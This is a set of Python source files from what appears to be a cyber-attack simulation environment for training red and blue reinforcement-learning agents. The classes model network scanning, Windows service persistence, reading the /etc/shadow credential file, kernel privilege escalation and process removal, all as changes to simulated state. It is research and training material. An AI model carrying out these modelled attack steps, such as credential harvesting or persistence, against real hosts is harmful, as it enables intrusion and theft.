                    reward -= 1 + self.obs_size(init[k])
            elif type(v) is list:
                list_init[k] = v

            else:
                val_init[k] = v

        for k, v in list_init.items():
            if k in list_current:
                for d_init in v:
                    for d_cur in list_current[k]:
                        if d_init == d_cur:
                            v.remove(d_init)
                            list_current[k].remove(d_cur)
                for i in range(len(v)):
                    if i < len(list_current[k]):
                        reward += self.obs_diff(v[i], list_current[k][i])
                    else:
                        reward -= self.obs_size(v[i])
                for i in range(len(v), len(list_current[k])):
                    reward -= self.obs_size(list_current[k][i])
                list_current.pop(k)
            else:
                reward -= 1
                for d in v:
                    reward -= self.obs_size(d)
        for k, v in list_current.items():
            reward -= 1
            for d in v:
                reward -= self.obs_size(d)

        reward -= len(dict(val_init.items() ^ val_current.items()))
        return reward

    # Method to find the size of an observation as a dictionary
    def obs_size(self, d):
        count = 0
        for k, v in d.items():
            if type(v) is dict:
                count += 1 + self.obs_size(v)
            elif type(v) is list:
                count += 1
                for i in v:
                    count += self.obs_size(i)
            else:
                count += 1
        return count



import inspect
from csle_cyborg.main import Main
from csle_cyborg.agents.simple_agents.meander import RedMeanderAgent
from csle_cyborg.agents.wrappers.blue_table_wrapper import BlueTableWrapper
from csle_cyborg.agents.wrappers.enum_action_wrapper import EnumActionWrapper
from csle_cyborg.agents.wrappers.open_ai_gym_wrapper import OpenAIGymWrapper
from csle_cyborg.agents.wrappers.reduce_action_space_wrapper import ReduceActionSpaceWrapper


def run():
    path = str(inspect.getfile(Main))
    path = path[:-7] + '/Shared/Scenarios/Scenario1b.yaml'
    red_agent = RedMeanderAgent
    agent_name = 'Red'
    c = OpenAIGymWrapper(agent_name,
                              EnumActionWrapper(
                                  ReduceActionSpaceWrapper(
                                      BlueTableWrapper(
                                          Main(path, 'sim', agents={'Red': red_agent}),
                                          output_mode='vector'))))
    for i in range(100):
        for i in range(50):
            c.step()
        c.reset()

# cProfile.run("run()", sort='cumtime')
run()

#cyborg = DummyVecEnv([lambda: cyborg])
# num_cpu = 4
# cyborg = SubprocVecEnv([make_blue_env(red_agent) for i in range(num_cpu)])



from random import choice

from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.actions.action import Action
from csle_cyborg.shared.actions.concrete_actions.stop_process import StopProcess
from csle_cyborg.simulator.session import VelociraptorServer
from csle_cyborg.simulator.state import State


class Remove(Action):
    def __init__(self, session: int, agent: str, hostname: str):
        super().__init__()
        self.agent = agent
        self.session = session
        self.hostname = hostname

    def sim_execute(self, state: State) -> Observation:
        # perform monitor at start of action
        #monitor = Monitor(session=self.session, agent=self.agent)
        #obs = monitor.sim_execute(state)

        parent_session: VelociraptorServer = state.sessions[self.agent][self.session]
        # find relevant session on the chosen host
        sessions = [s for s in state.sessions[self.agent].values() if s.host == self.hostname]
        if len(sessions) > 0:
            session = choice(sessions)
            obs = Observation(True)
            # remove suspicious processes
            if self.hostname in parent_session.sus_pids:
                for sus_pid in parent_session.sus_pids[self.hostname]:
                    action = StopProcess(session=self.session, agent=self.agent, target_session=session.ident, pid=sus_pid)
                    action.sim_execute(state)
            # remove suspicious files
            return obs
        else:
            return Observation(False)

    def __str__(self):
        return f"{self.__class__.__name__} {self.hostname}"



# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.shared.actions.action import Action


class SessionAction(Action):
    """Abstract class for a session level action.

    A session action is one that operates within the context of a single
    scenario/game instance in a single session.

    Note, here a session does not necessarily mean a remote SSH session,
    it may be a velociraptor session, Metasploit API session, etc

    Parameters
    ----------
    session : int
        the id of the session to perform action in
    """

    def __init__(self, session: int):
        """
        Parameters
        ----------
        session : int
            the id of the session to perform action in
        """
        super().__init__()
        self.session = session

    def emu_execute(self, session_handler):
        """Execute and action in emulator environment

        Parameters
        ----------
        session_handler : SessionHandler
           session handler object for game session of action (i.e. that
           matches session_id)

        Returns
        -------
        Observation
            Result of performing action
        """
        raise NotImplementedError

    def sim_execute(self, state):
        raise NotImplementedError

    def __str__(self):
        return (f"{self.__class__.__name__}: Session={self.session}")



# Copyright DST Group. Licensed under the MIT license.
import string
import random
from csle_cyborg.shared.actions.msf_actions_folder.msf_action import MSFAction
from csle_cyborg.simulator.session import SessionType, OperatingSystemType
from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.enums import AppProtocol


# Create a Windows service which runs an executable for persistence.


class ServicePersistenceWindows(MSFAction):
    def __init__(self, session: int, agent: str, target_session: int):
        super().__init__(session=session, agent=agent)
        self.session = session
        self.session_to_persist = target_session

    def sim_execute(self, state):
        obs = Observation()
        obs.set_success(False)

        if self.session not in state.sessions[self.agent] or self.session_to_persist not in state.sessions[self.agent]:
            return obs
        server_session = state.sessions[self.agent][self.session]
        session_to_persist = state.sessions[self.agent][self.session_to_persist]

        if server_session.session_type != SessionType.MSF_SERVER \
                or session_to_persist.session_type != SessionType.METERPRETER or not server_session.active \
                or not session_to_persist.active:
            return obs

        if not any(group.name == 'ADMINISTRATORS' for group in session_to_persist.user.groups) \
                and session_to_persist.user.username != 'SYSTEM':
            return obs

        if session_to_persist.host.os_type != OperatingSystemType.WINDOWS:
            return obs

        # find shared subnet of the two hosts
        server_interface = None
        per_interface = None
        for persist_interface in session_to_persist.host.interfaces:
            server_session, server_interface = self.get_local_source_interface(local_session=server_session,
                                                                               remote_address=persist_interface.ip_address,
                                                                               state=state)
            if server_interface is not None:
                per_interface = persist_interface
                break

        if server_interface is None:
            return obs

        server_address = server_interface.ip_address
        persist_address = per_interface.ip_address

        obs.set_success(True)

        new_session = state.add_session(host=session_to_persist.host.hostname, agent=self.agent,
                                        user=session_to_persist.user.username, session_type="meterpreter", parent=server_session)

        process = new_session.process
        process.ppid = session_to_persist.process.pid
        process.path = '/tmp/'  # NOTE: Change path to actual path...
        process.name = 'exploit.exe'
        local_port = session_to_persist.host.get_ephemeral_port()
        new_connection = {"Application Protocol": AppProtocol.TCP,
                          "remote_address": server_address,
                          "remote_port": 4433,
                          "local_address": persist_address,
                          "local_port": local_port}
        process.connections.append(new_connection)

        remote_port = {"local_port": 4433,
                       "Application Protocol": AppProtocol.TCP,
                       "local_address": server_address,
                       "remote_address": persist_address,
                       "remote_port": local_port
                       }
        server_session.process.connections.append(remote_port)

        obs.add_session_info(hostid=str(self.session_to_persist), session_id=new_session.ident,
                             session_type=new_session.session_type, agent=self.agent)

        obs.add_process(hostid=str(server_address), local_address=server_address, local_port=4433,
                        remote_address=persist_address,
                        remote_port=local_port)
        obs.add_process(hostid=str(self.session_to_persist), local_address=persist_address, local_port=local_port,
                        remote_address=server_address,
                        remote_port=4433,
                        process_name=process.name,
                        pid=process.pid)

        # Add persistence service to target host
        service_name = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(5))
        session_to_persist.host.add_service(service_name=service_name, process=process, session=session_to_persist)

        return obs

    def emu_execute(self, session_handler):
        pass


    def __str__(self):
        return super(ServicePersistenceWindows, self).__str__() + f", Meterpreter Session: {self.session_to_persist}"


# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.shared import enums as CyEnums
from csle_cyborg.shared.enums import OperatingSystemType as ost
from csle_cyborg.shared.actions.velociraptor_actions_folder.velociraptor_artifact_action import VelociraptorArtifactAction
from csle_cyborg.shared.observation import Observation


class KillProcessPID(VelociraptorArtifactAction):
    """Kill a process with the given PID"""

    def __init__(self, session: int, agent: str, hostname: str, process: int, ostype: ost):
        self.pid = process
        if ostype == CyEnums.OperatingSystemType.WINDOWS:

            command = f"taskkill!/f!/pid!{process}"

        else:

            command = f"/bin/kill!-9!{process}"

        self.debug(f"In KillProcessPID with command={command}")

        super().__init__(session=session,
                         hostname=hostname,
                         artifact='Custom.Cyborg.Generic.RunWindowsClientCommand',
                         env=dict(command=command),
                         agent=agent,
                         flow_completion_wait_limit=90
                         #                         tag=agent
                         )
        # self.agent = agent
        # self.hostname = hostname
        # self.pid = process
        # self.parameters['artifactname'] = ["Custom.CybORG.Generic.RunWindowsClientCommand",
        #                                    "Custom.Cyborg.Generic.RunLinuxClientCommand"]

        # # TBD: Change to a single artifact as Custom.CybORG.Generic.RunWindowsClientCommand
        # # and Custom.Cyborg.Generic.RunLinuxClientCommand are identical and will just be
        # # passed a different command string
        #
        # self.query = (
        #     'select collect_client('
        #     'client_id="<host_id>", '
        #     'artifacts=["Custom.Cyborg.Generic.RunWindowsClientCommand", '
        #     '"Custom.Cyborg.Generic.RunLinuxClientCommand"], '
        #     'env=dict(command="taskkill!/f!/pid!<process>", '
        #     'command="kill!-9!<process>")) '
        #     'FROM scope()'
        # )
        # self.source_query = (
        #     "select * from chain("
        #     "a={select * from source("
        #     "flow_id='<flowid>', "
        #     "client_id='<host_id>', "
        #     "artifact='Custom.Cyborg.Generic.RunWindowsClientCommand')}, "
        #     "b={select * from source("
        #     "flow_id='<flowid>', "
        #     "client_id='<host_id>', "
        #     "artifact='Custom.Cybprg.Generic.RunLinuxClientCommand')})"
        # )

    def sim_execute(self, state):
        raise NotImplementedError

    def parse(self, results: list, client_id: str) -> Observation:
        """Parses the results of the execute action to create an observation"""
        obs = Observation()
        self.debug(f"client_id={client_id} results={results}")
        if results[0]['Stderr'] == '':# or results[1]['stderr'] == '':
            obs.add_raw_obs(results)
            obs.set_success(True)
        else:
            obs.set_success(False)
        return obs

    def __str__(self):
        return super(KillProcessPID, self).__str__() + f", PID: {self.pid}"



# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.shared.actions.shell_actions_folder.credential_harvesting_folder.credential_harvesting import CredentialHarvesting
from csle_cyborg.shared.enums import OperatingSystemType, Path
from csle_cyborg.shared.observation import Observation


class ReadShadowFile(CredentialHarvesting):
    def __init__(self, session, agent):
        super().__init__(session, agent)

    def sim_execute(self, state):
        obs = Observation()
        obs.set_success(False)
        if self.session not in state.sessions[self.agent]:
            return obs
        session = state.sessions[self.agent][self.session]

        if not session.active:
            return obs

        if session.host.os_type == OperatingSystemType.WINDOWS:
            obs.add_system_info(hostid="0", os_type="windows")
        elif session.host.os_type == OperatingSystemType.LINUX:
            obs.add_system_info(hostid="0", os_type="linux")
            shadow_file = None
            for file in session.host.files:
                if file.name == "shadow" and Path.parse_string(file.path) == Path.ETC:
                    shadow_file = file
                    break
            if shadow_file is not None and shadow_file.check_readable(session.user):
                obs.set_success(True)
                for user in session.host.users:
                    obs.add_user_info(hostid="0", password_hash=user.password_hash,
                                      password_hash_type=user.password_hash_type,
                                      username=user.username)
        return obs



## The following code contains work of the United States Government and is not subject to domestic copyright protection under 17 USC § 105.
## Additionally, we waive copyright and related rights in the utilized code worldwide through the CC0 1.0 Universal public domain dedication.

"""
pertaining to actions that escalate a session on a host, or occur failing that
"""
# pylint: disable=invalid-name

from abc import abstractmethod
from typing import Tuple

from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.actions.concrete_actions.concrete_action import ConcreteAction
from csle_cyborg.shared.enums import OperatingSystemType, DecoyType
from csle_cyborg.simulator.host import Host
from csle_cyborg.simulator.process import Process
from csle_cyborg.simulator.session import Session
from csle_cyborg.simulator.state import State

class EscalateAction(ConcreteAction):
    """
    base class for actions that escalate a session on a host
    """
    def __init__(self, session: int, agent: str, target_session: int):
        super().__init__(session, agent)
        self.state = None
        self.target_session = target_session

    def emu_execute(self) -> Observation:
        raise NotImplementedError

    def sim_escalate(self, state: State, user: str) -> Observation:
        """
        escalate the session on the host if it works
        """
        self.state = state
        obs = Observation()
        if (self.session not in state.sessions[self.agent]
                or self.target_session not in state.sessions[self.agent]):
            obs.set_success(False)
            return obs
        target_host = state.hosts[state.sessions[self.agent][self.target_session].host]
        session = state.sessions[self.agent][self.session]
        target_session = state.sessions[self.agent][self.target_session]

        if not session.active or not target_session.active:
            obs.set_success(False)
            return obs

        is_compatible, necessary_processes = self.test_exploit_works(target_host)
        if not is_compatible:
            obs.set_success(False)
            return obs

        for proc in necessary_processes:
            if proc.decoy_type & DecoyType.ESCALATE:
                obs.set_success(False)
                obs.add_process(hostid=target_host.hostname, process_name=proc.name)
                return obs

        obs = self.__upgrade_session(user, target_host, target_session)
        return obs

    @abstractmethod
    def test_exploit_works(self, target_host: Host) ->\
            Tuple[bool, Tuple[Process, ...]]:
        """
        checks if OS and process information is correct for escalate to work.
        First return is True if compatible, False otherwise.
        Second return is tuple of all processes which must be valid for escalate to succeed.
        """
        raise NotImplementedError

    def __upgrade_session(self, username: str, target_host: Host, session: Session):
        """
        called when successful, upgrades the session privileges
        """
        if target_host.os_type == OperatingSystemType.WINDOWS:
            ext = 'exe'
            path = 'C:\\temp\\'
        elif target_host.os_type == OperatingSystemType.LINUX:
            ext = 'sh'
            path = '/tmp/'
        else:
            return Observation(False)
        obs = Observation()
        # upgrade session to new username
        session.username = username
        target_host.get_process(session.pid).user = username
        target_host.add_file(f'escalate.{ext}', path, username, 7,
                density=0.9, signed=False)
        # add in new session info to observation
        obs.add_session_info(hostid=str(target_host.hostname),
                             session_id=session.ident,
                             session_type=session.session_type,
                             username=username,
                             agent=self.agent)
        obs.set_success(True)
        return obs


class ExploreHost(ConcreteAction):
    """Gets information on host"""
    def __init__(self, session: int, agent: str, target_session: int):
        super().__init__(session, agent)
        self.target_session = target_session

    def emu_execute(self) -> Observation:
        raise NotImplementedError

    def sim_execute(self, state: State) -> Observation:
        if (self.session not in state.sessions[self.agent]
                or self.target_session not in state.sessions[self.agent]):
            return Observation(success=False)
        target_host = state.hosts[state.sessions[self.agent][self.target_session].host]
        obs = state.get_true_state(target_host.info)
        obs.set_success(True)
        return obs



from csle_cyborg.agents.simple_agents.b_line import B_lineAgent
from csle_cyborg.agents.simple_agents.base_agent import BaseAgent
from csle_cyborg.agents.simple_agents.blue_load_agent import BlueLoadAgent
from csle_cyborg.agents.simple_agents.blue_monitor_agent import BlueMonitorAgent
from csle_cyborg.agents.simple_agents.blue_react_agent import BlueReactRemoveAgent, BlueReactRestoreAgent
from csle_cyborg.agents.simple_agents.counter_kill_chain_agent import CounterKillchainAgent
from csle_cyborg.agents.simple_agents.green_agent import GreenAgent
from csle_cyborg.agents.simple_agents.heuristic_red import HeuristicRed
from csle_cyborg.agents.simple_agents.keyboard_agent import KeyboardAgent
from csle_cyborg.agents.simple_agents.killchain_agent import KillchainAgent
from csle_cyborg.agents.simple_agents.meander import RedMeanderAgent
from csle_cyborg.agents.simple_agents.sleep_agent import SleepAgent
from csle_cyborg.agents.simple_agents.test_agent import TestAgent
# from cyborg.agents.simple_agents.test_flat_fixed import TestFlatFixedAgent
# from cyborg.agents.simple_agents.test_keyboard_blue import KeyboardAgent
# from cyborg.agents.simple_agents.test_table_wrapper import TrueTableWrapper




# Copyright DST Group. Licensed under the MIT license.
from datetime import datetime
from csle_cyborg.shared.enums import FileType, FileVersion
from csle_cyborg.simulator.entity import Entity
from csle_cyborg.simulator.user import User


class File(Entity):
    def __init__(self, name: str, path: str, user: User, user_permissions: int = None,
                 group: str = None, group_permissions: int = None, default_permissions: int = None,
                 create_time: str = None, last_modified_time: str = None,
                 last_access_time: str = None, file_type: str = None, vendor: str = None, version: str = None,
                 density=0, signed=False):
        super().__init__()
        self.name = name
        self.path = path
        self.user = user
        self.user_permissions = user_permissions
        if self.user_permissions is None and self.user is not None:
            self.group_permissions = 7
        self.group = group
        self.group_permissions = group_permissions
        if self.group_permissions is None and self.group is not None:
            self.group_permissions = 7
        self.default_permissions = default_permissions
        if self.default_permissions is None:
            self.default_permissions = 7
        self.create_time = create_time
        self.last_modified_time = last_modified_time
        if self.last_modified_time is not None:
            self.last_modified_time = datetime.strptime(self.last_modified_time, "%d %b %Y %H:%M")
        self.last_access_time = last_access_time
        self.file_type = FileType.UNKNOWN
        if file_type is not None:
            if type(file_type) is not FileType:
                file_type = FileType.parse_string(file_type)
            self.file_type = file_type
        self.vendor = vendor
        self.version = None
        if version is not None:
            self.version = FileVersion.parse_string(version)

        self.density = density
        self.signed = signed

    def get_state(self):
        obs = {"path": self.path,
               "name": self.name,
               "vendor": self.vendor,
               "version": self.version,
               "file_type": self.file_type,
               "user_permissions": self.user_permissions,
               "group": self.group,
               "group_permissions": self.group_permissions,
               "default_permissions": self.default_permissions,
               "last_modified_time": self.last_modified_time,
               "user": self.user}
        return obs

    # Checks if the file is executable by a given user - assumes the user and file are on the same dict
    def check_executable(self, user: User):
        if self.default_permissions % 2:
            return True
        if self.group in user.groups and self.group_permissions % 2:
            return True
        if self.user == user and self.user_permissions % 2:
            return True
        return False

    def check_readable(self, user: User):
        if self.default_permissions >= 4:
            return True
        if self.group in user.groups and self.group_permissions >= 4:
            return True
        if self.user == user.username and self.user_permissions >= 4:
            return True
        if user.username == 'SYSTEM':
            return True
        return False



# Copyright DST Group. Licensed under the MIT license.

from csle_cyborg.shared.enums import QueryType
from csle_cyborg.shared.observation import Observation
from .velociraptor_action import VelociraptorAction


class GetUserInfo(VelociraptorAction):
    """Gets information about a user"""

    def __init__(self, session: int, agent: str, hostname: str, username: str):
        super().__init__(session=session,
                         query_type=QueryType.ASYNC,
                         agent=agent)
        self.agent = agent
        self.hostname = hostname
        self.username = username
        self.parameters['artifactname'] = 'Custom.Wrappered.*.Sys.Users'
        self.query = (
            "select collect_client("
            "client_id='<host_id>', "
            "artifacts=['Custom.Wrappered.Windows.Sys.Users', "
            "'Custom.Wrappered.Linux.Sys.Users'], "
            "env=dict(agentid='<agentid>', "
            "artifactname='<artifactname>', "
            "tag='<tag>'))"
            " FROM scope()"
        )
        self.source_query = (
            "select * from chain("
            "a={select Name, Uid, Gid from source("
            "flow_id='<flowid>', "
            "client_id='<host_id>', "
            "artifact='Custom.Wrappered.Windows.Sys.Users') "
            "where Name='<username>'}, "
            "b={select User, Uid, Gid from source("
            "flow_id='<flowid>', "
            "client_id='<host_id>', "
            "artifact='Custom.Wrappered.Linux.Sys.Users') "
            "where User='<username>'})"
        )

    def sim_execute(self, state):
        raise NotImplementedError

    def parse(self, results: list) -> Observation:
        """Parses the results of the execute action to create an observation"""
        obs = Observation()

        if results == []:
            obs.set_success(False)
            return obs
        else:
            obs.set_success(True)

        obs.add_system_info(hostid='0', hostname=self.hostname)

        user_data = results[0]
        if 'User' in user_data:
            obs.add_user_info(
                hostid='0',
                username=user_data['User'],
                uid=user_data['Uid'],
                gid=user_data['Gid']
            )
        else:
            obs.add_user_info(
                hostid='0',
                username=user_data['Name'],
                uid=user_data['Uid'],
                gid=user_data['Gid']
            )
        return obs



from ipaddress import IPv4Network

from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.actions.action import Action
from csle_cyborg.shared.actions.shell_actions_folder.network_scan_folder.ping_sweep import PingSweep


class GreenPingSweep(Action):
    def __init__(self, session: int, agent: str, subnet: IPv4Network):
        super().__init__()
        self.subnet = subnet
        self.agent = agent
        self.session = session

    def sim_execute(self, state) -> Observation:
        # find session inside or close to the target subnet
        session = self.session
        # run pingsweep on the target subnet from selected session
        sub_action = PingSweep(session=self.session, agent=self.agent, subnet=self.subnet)
        obs = sub_action.sim_execute(state)
        return obs

    def __str__(self):
        return f"{self.__class__.__name__} {self.subnet}"



# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.simulator.entity import Entity
import enum


class ServiceState(enum.Enum):
    """An enum for representing the different states of services. """
    UNKNOWN = enum.auto()
    OPEN = enum.auto()
    CLOSED = enum.auto()
    FILTERED = enum.auto()

    @classmethod
    def parse_string(cls, service_string):
        if service_string.lower() == "open":
            return cls.OPEN
        elif service_string.lower() == "closed":
            return cls.CLOSED
        elif service_string.lower() == "filtered":
            return cls.FILTERED
        else:
            return cls.UNKNOWN

    def __str__(self):
        return self.name


class ServiceVersion(enum.Enum):
    """An enum for representing the different versions of services. """
    UNKNOWN = enum.auto()
    OpenSSH7_6p1 = enum.auto()

    @classmethod
    def parse_string(cls, service_string):
        if service_string.lower() == "openssh 7.6p1":
            return cls.OpenSSH7_6p1
        else:
            return cls.UNKNOWN

    def __str__(self):
        return self.name


class StartupType(enum.Enum):
    """An enum for representing the different startup types of services. """

    @classmethod
    def parse_string(cls, service_string):
        pass

    def __str__(self):
        return self.name


class Service(Entity):
    def __init__(self, name: str = None, port: list = None, state: ServiceState = None, version: ServiceVersion = None,
                 startup_type: StartupType = None, user_running_as: str = None, permissions: dict = None):
        super().__init__()
        self.name = name
        self.state = state
        self.version = version
        self.startup_type = startup_type
        self.user_running_as = user_running_as
        self.permissions = permissions

    def get_state(self):
        pass



# Copyright DST Group. Licensed under the MIT license.
import copy
import inspect
import yaml
from csle_cyborg.shared.actions.action import Action
from csle_cyborg.shared.environment_controller import EnvironmentController
from csle_cyborg.shared.observation import Observation
from csle_cyborg.simulator.state import State


class SimulationController(EnvironmentController):
    """The class that controls the Simulation environment.

    Inherits from Environment Controller then implements simulation-specific functionality.
    Most methods are either disabled or delegate their functionality to the State attribute.
    The main thing this class currently does is parse the scenario file.
    """

    def __init__(self, scenario_filepath: str = None, scenario_mod: dict = None, agents: dict = None, verbose=True):
        self.state = None
        super().__init__(scenario_filepath, scenario_mod=scenario_mod, agents=agents)

    def reset(self, agent=None):
        self.state.reset()
        self.hostname_ip_map = {h: ip for ip, h in self.state.ip_addresses.items()}
        self.subnet_cidr_map = self.state.subnet_name_to_cidr
        return super(SimulationController, self).reset(agent)

    def pause(self):
        pass

    def execute_action(self, action: Action) -> Observation:
        return action.sim_execute(self.state)

    def restore(self, file: str):
        pass

    def save(self, file: str):
        pass

    def get_true_state(self, info: dict) -> Observation:
        output = self.state.get_true_state(info)
        return output

    def shutdown(self, **kwargs):
        pass

    def _parse_scenario(self, scenario_filepath: str, scenario_mod: dict = None):
        from csle_cyborg.main import Main
        scenario_dict = super()._parse_scenario(scenario_filepath, scenario_mod=scenario_mod)
        images_file_path = str(inspect.getfile(Main))
        images_file_path = images_file_path[:-7] + '/shared/scenarios/images/'
        with open(images_file_path + 'images.yaml') as fIn:
            images_dict = yaml.load(fIn, Loader=yaml.FullLoader)
        if scenario_dict is not None:
            for hostname, image in scenario_dict["Hosts"].items():
                if 'path' in images_dict[image["image"]]:
                    with open(images_file_path + images_dict[image["image"]]['path'] + '.yaml') as fIn2:
                        scenario_dict["Hosts"][hostname].update(
                            yaml.load(fIn2, Loader=yaml.FullLoader).pop('Test_Host'))
                    image.pop('image')
                else:
                    scenario_dict["Hosts"][hostname] = copy.deepcopy(images_dict[image["image"]])
        return scenario_dict

    def _create_environment(self):
        self.state = State(self.scenario)
        self.hostname_ip_map = {h: ip for ip, h in self.state.ip_addresses.items()}
        self.subnet_cidr_map = self.state.subnet_name_to_cidr

    def run_schtasks(self):
        for host in self.hosts:
            host.run_scheduled_tasks(self.step)

    def get_last_observation(self, agent):
        return self.observation[agent]



## The following code contains work of the United States Government and is not subject to domestic copyright protection under 17 USC § 105.
## Additionally, we waive copyright and related rights in the utilized code worldwide through the CC0 1.0 Universal public domain dedication.

"""
pertaining to the V4L2 permissions escalation action
"""
# pylint: disable=invalid-name
from typing import Tuple
from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.actions.concrete_actions.escalate_action import EscalateAction
from csle_cyborg.shared.enums import OperatingSystemType
from csle_cyborg.simulator.host import Host
from csle_cyborg.simulator.process import Process
from csle_cyborg.simulator.state import State


class V4L2KernelExploit(EscalateAction):
    """
    Implements the V4L2 permissions escalation action
    """

    def sim_execute(self, state: State) -> Observation:
        return self.sim_escalate(state, "root")

    def emu_execute(self) -> Observation:
        raise NotImplementedError

    def test_exploit_works(self, target_host: Host) -> Tuple[bool, Tuple[Process, ...]]:
        # the exact patches and OS distributions are described here:
        return target_host.os_type == OperatingSystemType.LINUX, ()



import math
from prettytable import PrettyTable
import numpy as np
from csle_cyborg.agents.wrappers.base_wrapper import BaseWrapper
from csle_cyborg.agents.wrappers.true_table_wrapper import TrueTableWrapper


class RedTableWrapper(BaseWrapper):
    def __init__(self, env=None, agent=None, output_mode='table'):
        super().__init__(env,agent)
        self.env = TrueTableWrapper(env=env, agent=agent)
        self.agent = agent

        self.red_info = {}
        self.known_subnets = set()
        self.step_counter = -1
        self.id_tracker = -1
        self.output_mode = output_mode
        self.success = None

    def reset(self, agent=None):
        self.red_info = {}
        self.known_subnets = set()
        self.step_counter = -1
        self.id_tracker = -1
        self.success = None
        result = self.env.reset(agent)
        if agent =='Red':
            obs = self.observation_change(result.observation)
            result.observation = obs
        return result

    def get_table(self,output_mode='red_table'):
        if output_mode == 'red_table':
            return self._create_red_table()
        elif output_mode == 'true_table':
            return self.env.get_table()

    def observation_change(self, observation):
        self.success = observation['success']

        self.step_counter += 1
        if self.step_counter <= 0:
            self._process_initial_obs(observation)
        elif self.success:
            self._update_red_info(observation)

        if self.output_mode == 'table':
            obs = self._create_red_table()
        elif self.output_mode == 'vector':
            obs = self._create_vector()
        elif self.output_mode == 'raw':
            obs = observation
        else:
            raise NotImplementedError('Invalid output_mode')

        return obs

    def _process_initial_obs(self, obs):
        for hostid in obs:
            if hostid == 'success':
                continue
            host = obs[hostid]
            interface = host['Interface'][0]
            subnet = interface['Subnet']
            self.known_subnets.add(subnet)
            ip = str(interface['IP Address'])
            hostname = host['System info']['Hostname']
            self.red_info[ip] = [str(subnet), str(ip), hostname, False, 'Privileged']

    def _update_red_info(self, obs):
        action = self.get_last_action(agent='Red')
        name = action.__class__.__name__
        if name == 'DiscoverRemoteSystems':
            self._add_ips(obs)
        elif name == 'DiscoverNetworkServices':
            ip = str(obs.popitem()[1]['Interface'][0]['IP Address'])
            self.red_info[ip][3] = True
        elif name == 'ExploitRemoteService':
            self._process_exploit(obs)
        elif name == 'PrivilegeEscalate':
            hostname = action.hostname
            self._process_priv_esc(obs, hostname)

    def _generate_name(self, datatype: str):
        self.id_tracker += 1
        unique_id = 'UNKNOWN_' + datatype + ': ' + str(self.id_tracker)
        return unique_id

    def _add_ips(self, obs):
        for hostid in obs:
            if hostid == 'success':
                continue
            host = obs[hostid]
            for interface in host['Interface']:
                ip = interface['IP Address']
                subnet = interface['Subnet']
                if subnet not in self.known_subnets:
                    self.known_subnets.add(subnet)
                if str(ip) not in self.red_info:
                    subnet = self._get_subnet(ip)
                    hostname = self._generate_name('HOST')
                    self.red_info[str(ip)] = [subnet, str(ip), hostname, False, 'None']
                elif self.red_info[str(ip)][0].startswith('UNKNOWN_'):
                    self.red_info[str(ip)][0] = self._get_subnet(ip)

    def _get_subnet(self, ip):
        for subnet in self.known_subnets:
            if ip in subnet:
                return str(subnet)
        return self._generate_name('SUBNET')

    def _process_exploit(self, obs):
        for hostid in obs:
            if hostid == 'success':
                continue

            host = obs[hostid]
            if 'Sessions' in host:
                ip = str(host['Interface'][0]['IP Address'])
                hostname = host['System info']['Hostname']
                session = host['Sessions'][0]
                access = 'Privileged' if 'Username' in session else 'User'

                self.red_info[ip][2] = hostname
                self.red_info[ip][4] = access

    def _process_priv_esc(self, obs, hostname):
        if obs['success'] == False:
            [info for info in self.red_info.values() if info[2] == hostname][0][4] = 'None'
        else:
            for hostid in obs:
                if hostid == 'success':
                    continue
                host = obs[hostid]
                ip = host['Interface'][0]['IP Address']
    
                if 'Sessions' in host:
                    access = 'Privileged'
                    self.red_info[str(ip)][4] = access
                else:
                    subnet = self._get_subnet(ip)
                    hostname = self._generate_name('HOST')
    
                    if str(ip) not in self.red_info:
                        self.red_info[str(ip)] = [subnet, str(ip), hostname, False, 'None']
                    else:
                        self.red_info[str(ip)][0] = subnet
                        self.red_info[str(ip)][2] = hostname

    def _create_red_table(self):
        # The table data is all stored inside the ip nodes
        # which form the rows of the table
        table = PrettyTable([
            'Subnet',
            'IP Address',
            'Hostname',
            'Scanned',
            'Access',
        ])
        for ip in self.red_info:
            table.add_row(self.red_info[ip])

        table.sortby = 'IP Address'
        table.success = self.success
        return table

    def _create_vector(self, num_hosts=13):
        table = self._create_red_table()._rows

        # Compute required length of vector based on number of hosts
        padding = num_hosts - len(table)
        id_length = math.ceil(math.log2(num_hosts))

        success_value = int(self.success.value) if self.success.value < 2 else -1
        proto_vector = [success_value]
        for row in table:
            # Scanned
            proto_vector.append(int(row[3]))

            # Access
            access = row[4]
            if access == 'None':
                value = [0, 0]
            elif access == 'User':
                value = [1, 0]
            elif access == 'Privileged':
                value = [0, 1]
            else:
                raise ValueError('Table had invalid Access Level')
            proto_vector.extend(value)

        proto_vector.extend(padding * 3 * [-1])

        return np.array(proto_vector)

    def get_attr(self,attribute:str):
        return self.env.get_attr(attribute)

    def get_observation(self, agent: str):
        if agent != 'Red' or self.output_mode == 'raw':
            obs = self.get_attr('get_observation')(agent)
        elif self.output_mode == 'table':
            obs = self.get_table()
        elif self.output_mode == 'vector':
            obs = self._create_vector()
        else:
            raise NotImplementedError('Invalid output_mode')

        return obs

    def get_agent_state(self,agent:str):
        return self.get_attr('get_agent_state')(agent)

    def get_action_space(self,agent):
        return self.get_attr('get_action_space')(agent)

    def get_last_action(self,agent):
        return self.get_attr('get_last_action')(agent)

    def get_ip_map(self):
        return self.get_attr('get_ip_map')()

    def get_rewards(self):
        return self.get_attr('get_rewards')()



from .heuristic_red import HeuristicRed


class DebuggingAgent(HeuristicRed):
    def __init__(self, ip_list:list,session=0, priority=None):
        super().__init__(session=session, priority=priority)
        self.ip_list = ip_list
        self.position = 0
        self.active_ip = self.ip_list[self.position]

    def _choose_ip(self):
        ip = self.active_ip
        status = self.ip_status[ip]
        if status >= 3:
            self.position += 1 if self.position < len(self.ip_list) - 1 else 0
            ip = self.active_ip = self.ip_list[self.position]

        return ip



# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.shared.enums import QueryType
from csle_cyborg.shared.observation import Observation

from .velociraptor_action import VelociraptorAction


class GetAlerts(VelociraptorAction):
    """Get latest alerts.

    This action will poll server for any new alerts (since last poll)
    for artifacts monitored by the target session (as defined in scenario
    file).
    """

    def __init__(self, session: int, agent: str):
        super().__init__(session=session,
                         query_type=QueryType.SYNC,
